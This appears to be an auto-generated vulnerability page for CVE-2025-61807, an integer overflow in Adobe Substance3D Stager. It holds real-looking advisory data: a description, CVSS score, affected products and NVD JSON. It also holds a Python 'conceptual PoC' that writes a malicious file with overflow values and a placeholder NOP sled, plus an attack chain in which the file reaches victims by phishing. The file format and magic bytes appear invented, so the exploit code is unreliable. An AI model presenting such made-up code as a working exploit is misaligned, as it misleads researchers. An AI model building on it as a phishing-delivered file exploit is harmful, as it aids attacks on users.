Security Vulnerability Report
CVE-2025-61807 CVSS 7.8 HIGH

CVE-2025-61807

Published: 2025-10-14 20:15:53
Last Modified: 2025-10-16 17:37:34

Description

Substance3D - Stager versions 3.1.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Substance3D Stager <= 3.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61807 PoC - Conceptual Proof of Concept
# Integer Overflow in Adobe Substance3D Stager
# WARNING: This is a conceptual PoC for educational purposes only.

import struct
import os


def create_malicious_file(output_path):
    """
    Create a malicious Substance3D Stager file that triggers
    integer overflow vulnerability (CVE-2025-61807).

    The vulnerability is triggered when parsing specific numeric
    fields in the project/scene file. By providing values that
    cause integer overflow during internal calculations, we can
    trigger memory corruption leading to arbitrary code execution.
    """
    # File header (simplified representation of a Stager project file)
    header = b'SBSSTAGER\x00'  # Magic bytes
    header += struct.pack('<I', 0x00010001)  # Version 1.1

    # Crafted numeric field that triggers integer overflow
    # When the parser multiplies this value internally,
    # it overflows the 32-bit integer range
    overflow_value = 0x7FFFFFFF  # Maximum signed 32-bit integer

    # Payload structure designed to cause overflow during processing
    payload = b''
    payload += struct.pack('<I', overflow_value)  # Width causing overflow
    payload += struct.pack('<I', overflow_value)  # Height causing overflow
    payload += struct.pack('<I', 0x00000002)  # Channel multiplier

    # The multiplication overflow_value * overflow_value * 2
    # will wrap around, causing a small buffer allocation
    # while large data follows

    # Malicious shellcode or payload (placeholder)
    # In a real exploit, this would contain shellcode
    # that executes when the buffer overflow occurs
    malicious_data = b'\x90' * 4096  # NOP sled (placeholder)

    with open(output_path, 'wb') as f:
        f.write(header)
        f.write(payload)
        f.write(malicious_data)

    print(f"[+] Malicious file created: {output_path}")
    print(f"[!] When opened in Substance3D Stager <= 3.1.4,")
    print(f" this file triggers CVE-2025-61807")


if __name__ == '__main__':
    create_malicious_file('exploit.sbsar')

# Attack chain:
# 1. Attacker crafts malicious Stager file with overflow values
# 2. Attacker distributes file via phishing/social engineering
# 3. Victim opens file in Substance3D Stager
# 4. Integer overflow occurs during file parsing
# 5. Buffer overflow leads to arbitrary code execution
# 6. Attacker code runs with victim's privileges

References

https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61807", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:53.403", "lastModified": "2025-10-16T17:37:33.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Stager versions 3.1.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.5", "matchCriteriaId": "AB3C6EBF-2CF4-413D-AC6B-AAF49BA08B2F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}